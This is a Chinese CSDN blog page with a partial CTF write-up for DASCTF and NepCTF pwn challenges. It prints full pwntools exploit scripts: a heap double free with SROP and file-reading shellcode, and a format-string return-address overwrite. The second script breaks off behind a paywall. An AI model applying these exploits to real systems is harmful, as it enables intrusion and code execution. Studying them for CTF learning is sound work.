DASCTF&NepCTF 部分writeup

最新推荐文章于 2022-05-23 19:11:13 发布
最新推荐文章于 2022-05-23 19:11:13 发布
阅读量4.3k 收藏 2
点赞数 2
分类专栏: CTF WriteUp 文章标签: 安恒月赛 逆向
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/106974426
版权
本文分享了作者在DASCTF和NepCTF中的解题经验,涉及PWN领域的oooorder、springboard和easyheap等题目,通过double free、格式化字符串漏洞和堆利用技术进行攻击。在RE部分,解析了T0p Gear的字符串比较和pyCharm的Python字节码混淆问题。此外,还介绍了Misc类别中的透明度挑战,通过图像隐藏信息提取出压缩包并爆破密码。
摘要由CSDN通过智能技术生成

目录

PWN

oooorder

一道不太复杂的题目,利用点都是之前遇到的,运气好拿到了一血

edit中进行了realloc,如果size为0就会执行free,利用这个进行double free,由于禁用了execve,需要用setcontext执行mprotect并执行orw的shellcode
在这里插入图片描述
关于orw部分,具体请见这篇博客:BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)

from pwn import *


r = remote("183.129.189.60", 10028)
#r = process("./oooorder/oooorder")


context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''	
	b *$rebase(0x1355)
	c
	''')


elf = ELF("./oooorder/oooorder")
libc = ELF('./oooorder/libc-2.27.so')
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]


menu = "Your choice :\n"
def add(size, payload):
	r.recvuntil(menu)
	r.sendline('1')
	r.recvuntil("How much is the order?\n")
	r.sendline(str(size))
	r.recvuntil("Order notes:\n")
	r.send(payload)


def delete(index):
	r.recvuntil(menu)
	r.sendline('4')
	r.recvuntil("Index of order:\n")
	r.sendline(str(index))


def show():
	r.recvuntil(menu)
	r.sendline('3')




def edit(index, content):
	r.recvuntil(menu)
	r.sendline('2')
	r.recvuntil("Index of order:\n")
	r.sendline(str(index))
	r.recvuntil("Order notes:\n")
	r.send(content)


for i in range(8):
	add(0x130, 'KMFL')


for i in range(8):
	delete(7-i)


for i in range(7):
	add(0x130, 'a'*8)


add(0x30, 'a'*8) #7
show()
r.recvuntil('[7]:aaaaaaaa')
malloc_hook = u64(r.recvuntil('\x7f').ljust(8, '\x00')) - 0x60 - 0x10
libc.address = malloc_hook - libc.sym['__malloc_hook']
success("libc:"+hex(libc.address))
system = libc.sym['system']
free_hook = libc.sym['__free_hook']
set_context = libc.symbols['setcontext']
new_addr =  free_hook &0xFFFFFFFFFFFFF000
shellcode1 = '''
xor rdi,rdi
mov rsi,%d
mov edx,0x1000


mov eax,0
syscall


jmp rsi
''' % new_addr


frame = SigreturnFrame()
frame.rsp = free_hook+0x10
frame.rdi = new_addr
frame.rsi = 0x1000
frame.rdx = 7
frame.rip = libc.sym['mprotect']


shellcode2 = '''
mov rax, 0x67616c662f ;// /flag
push rax


mov rdi, rsp ;// /flag
mov rsi, 0 ;// O_RDONLY
xor rdx, rdx ;
mov rax, 2 ;// SYS_open
syscall


mov rdi, rax ;// fd 
mov rsi,rsp  ;
mov rdx, 1024 ;// nbytes
mov rax,0 ;// SYS_read
syscall


mov rdi, 1 ;// fd 
mov rsi, rsp ;// buf
mov rdx, rax ;// count 
mov rax, 1 ;// SYS_write
syscall


mov rdi, 0 ;// error_code
mov rax, 60
syscall
'''


# add 8
r.recvuntil(menu)
r.sendline('1')
r.recvuntil("How much is the order?\n")
r.sendline('0')


# delete 8
r.recvuntil(menu)
r.sendline('2')
r.recvuntil("Index of order:\n")
r.sendline('8')


# delete 8
r.recvuntil(menu)
r.sendline('2')
r.recvuntil("Index of order:\n")
r.sendline('8')


show()
r.recvuntil('[8]:')
heap = u64(r.recv(6).ljust(8, '\x00'))
success("heap:"+hex(heap))
heap_base = heap - 0xd80
success("heap_base:"+hex(heap_base))


edit(5, str(frame))
delete(6)
add(0x10, p64(heap_base+0xe0))
add(0x10, p64(free_hook)*2)


payload = p64(set_context+53)+p64(free_hook+0x18)*2+asm(shellcode1)
add(0x130, payload)
delete(5)
r.sendline(asm(shellcode2))


r.interactive()

springboard

格式化字符串漏洞,字符串在堆上,先泄露libc,然后利用栈上的一些指向栈空间的指针把返回地址改成one gadget 即可
我原来的博客里有详细解法:BUUCTF-PWN刷题记录-18(格式化字符串漏洞)

from pwn import *


r = remote("183.129.189.60", 10029)
#r = process("./springboard")
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''
	b *$rebase(0x956)
	b *$rebase(0x97F)
	c
	''')
context.log_level = 'debug'
libc = ELF("./libc/libc-2.27.so")


r.recvuntil("input your name:")
payload = '%11$p\n%13$p\n'
r.sendline(payload)
r.recvuntil("your name:\n")
libc.address = int(r.recvuntil('\n').strip(), 16) - 231 - libc.sym['__libc_start_main']
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]
malloc_hook = libc.sym['__malloc_hook']
one_gadget = one_gadget_18[2] + libc.address
success("one_gadget:"+hex(one_gadget))
stack = int(r.recvuntil('\n').strip(), 16)
ret_addr = stack - 0xe0
success("ret:"+hex(ret_addr))


num = ret_addr & 0xFFFF
r.recvuntil("input your name:")
payload = '%' + str(num) + 'c%13$hn\n'
r.sendline(payload)


num =
最低0.47元/天 解锁文章
L.o.W
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
1.只有本地管理员才能访问本页面2.notes Happy Why am lfeeling so happy today? Well ljust got to spend threedays with
记录笔记
04-12 2528
只有本地管理员才能访问本页面 F12 看看源码 没啥东西 御剑看看后台 也没看出来有啥 看了下 需要管理员权限 在headers里面设置 添加一行 X-Forwarded-For127.0.0.1 flag{sgwxsSesSD232se14sdSVSsx} notes Happy Why am lfeeling so happy today? Well ljust got to spend threedays with some of my very best friends having fun t
nepctf_misc
resu09的博客
04-03 304
0x01 签到 题目给一大堆 十六进制串 ,如图形式 想到转二进制,然后根据二进制的点数来画图。 这里用Cyerchef 画图 0x02 出题人日记 本题,用010打开出题人日记.xlsx 文件,发现开头为50 4B 03 04的格式,于是将后缀名改为zip格式,然后解压,逐个文件夹寻找, 发现在media 文件里面 有一个文件标注 为 flag 文件,猜测里面可能含有flag,同时注意到旁边有hint 用010打开后缀为flag的文件,发现是 一个png图片。 同时
BugkuCTF---管理员系统
qq_43592364的博客
04-14 2973
题目链接:链接 打开题目链接,看到的是一个陆界面,还是先随便试一下用户名和陆密码吧 提示是:IP禁止访问,请联系本地管理员陆,IP已被记录 那就看一下页面元素,发现了一堆Base64的密文,那就用Hackbar来解密一下试试 得到了一个test123的字符串,那就试一试会不会是用户名和密码 结果还是一样没有任何变化,提示依旧是联系本地管理员,那不如试一下伪造成本地登录 用burps...
CTF每日一题 | Web 后台
qq_42646885的博客
07-11 1110
打开网页如下:简单的字母提示和一个按钮。 点击按钮,页面出现提示:Only Member with Admin rights is allow to enter。意思是只能以管理员身份进入网站后台。 用brupsuit抓包,看看数据包的发送情况: 返回的数据包中设置了cookie的值,Member的值经过了base64加密。在burpsuite的decoder模块解码——>...
BugkuCTF-WEB-管理员系统
烟雨天青色
08-27 2163
打开题目是如上图界面,网页给了一个陆的页面,刚看起来还有点像SQL注入的样子,打开源代码看一下: 源代码里确实有点东西,有一个经过base64编码的字符串,先解码看一下: 解码之后结果为test123,猜想一下,这既然是一个后台的管理员系统,用户名指定为admin,那么这个执行就是密码没错了,填上测试一下: 出事了,输入username和password之后,网页提示“IP...
NepCTF比赛官方writeup1
08-04
NepCTF比赛官方writeup1
ADS Writeup_ads_
10-03
"Advanced Data Structure Writeup" 提供了一个深入探讨这一领域的详细分析,涵盖了各种复杂的数据结构及其在实际问题解决中的应用。 **一、数组** 数组是最基础的数据结构,它提供了固定大小且连续的内存空间来...
2023 强网杯 Writeup
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
XDCTF2014部分官方Writeup.doc
09-30
在访问特定的URL后,可以看到一个新的Python文件newapp.py的部分内容。关键在于,通过编写简单的爬虫或者使用Burp Suite工具,收集所有可能的文件内容。在这个过程中,找到了一个名为xdctf的函数,当特定条件满足时...
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup
最新发布
05-27
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup解析部分题目
CTF wiki srop 学习记录
m0_57754423的博客
03-04 351
参考wiki,hollk师傅博客。 说一下我的个人理解,当题目中没有足够的gadget ,可以直接或者间接控制rax,题目中有syscall就可以利用这种攻击手法。 srop: 在unix系统发生signal的时候会执行sigreturn 系统调用。 signal机制: signal 机制是类 unix 系统中进程之间相互传递信息的一种方法。一般,我们也称其为软中断信号,或者软中断。比如说,进程之间可以通过系统调用 kill 来发送软中断信号。 介绍: 1.内核向某个程序中发送signal机制
2021NepCTF REVERSE-Hardcsharp Writeup
Nu1bzzi的博客
03-22 409
2021NepCTF REVERSE-Hardcsharp 首先拿到文件第一步用PEiD查壳(养成好习惯) 什么都没找到QAQ,萌新只知道是32位的程序于是顺手放进IDA进行分析 在放入时发现该程序是由.NET做的 进入后点进jmp后的函数果然发现了熟悉的东西 直接放入Dnspy中进行分析(Dnspy的详细使用方法和下载地址在这里????QAQ) 一个个点开之后发现我们要分析的主要函数在@02000002中 而我们需要注意的是这部分的运算 由for循环函数可知array[]数组中每一项都与51做了
[DASCTF2022]三月月赛WriteUp Web部分全复现
Pysnow's Blog
04-11 3407
Web ezpop ezpop <?php highlight_file(__FILE__); class crow { public $v1; public $v2; function eval() { echo "crow::eval<br>"; echo new $this->v1($this->v2); } public function __invoke() { echo
安恒月赛2020年DASCTF——四月春季赛---Web-Writeup
SopRomeo的博客
04-29 3691
比赛的时候去玩了,刚好兄弟们发了第一个web的源码,于是我自己复现了一下 <?php show_source("index.php"); error_reporting(0); function write($data){ return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data){...
DASCTF&BJDCTF 3rd 部分writeup
weixin_44145820的博客
05-24 3085
目录MiscVm MiscVm addr = 0x203020 ans = [] for i in range(32): tmp = hex(Dword(addr+i*4)) print(tmp) ans.append(tmp[:-1]) print ans
2022DASCTF MAY 出题人挑战赛 Writeup
末初的CSDN博客
05-23 982
2022DASCTF MAY 出题人挑战赛 Writeup
2020年DASCTF六月团队赛 REVERSE Magia
hhcjl的博客
06-30 732
2020年DASCTF六月团队赛 REVERSE Magia2020年DASCTF六月团队赛 REVERSE MagiaIDA静态分析字符串输入检测字符间逻辑检测继续IDA分析利用XDBG进行动态分析 2020年DASCTF六月团队赛 REVERSE Magia IDA静态分析 程序为32位Windows程序,拖入IDA3Pro分析 字符串输入检测 输入字符串后进入sub_403290()函数检测,满足以下条件: 1.字符串必须为32位。 2、第1、2、3、4、32位分别为‘N’、‘e’、‘p’、
UNCTF2020部分writeup
坤坤做的笔记
11-28 667
Web题:L0vephp 提示读取源代码,发现注释中有如下提示: 【B4Z0-@:OCnDf,】猜测是base家族编码,base85解出来为:get action 利用PHP伪协议读取,发现base被禁了, 于是采用utf-7: 还原得到: 将【316E4433782E706870】十六进制转换为字符串【1nD3x.php】 访问1nD3x.php 经过学长提示,发现可以用远程包含,利用include$_GET[1];可以完成,于是payload: &1=data://text/
2020DASCTF——七月赛
cwr1499640048的博客
07-25 1380
CRYPTO——bullshit 题目源代码 def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in range(0,len(message)
2020 YCBCTF羊城杯官方Writeup:PHP与Web安全解题技巧实录
以下是各个部分的主要知识点和解题步骤: 1. WEB类别 - Easycon: - 考点:一句话木马和本地文件读取 - 解题步骤:利用`eavlpostcmd`命令执行一句话木马,通过Base64编码解析获取的文件内容,将缺失的头部补全后...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值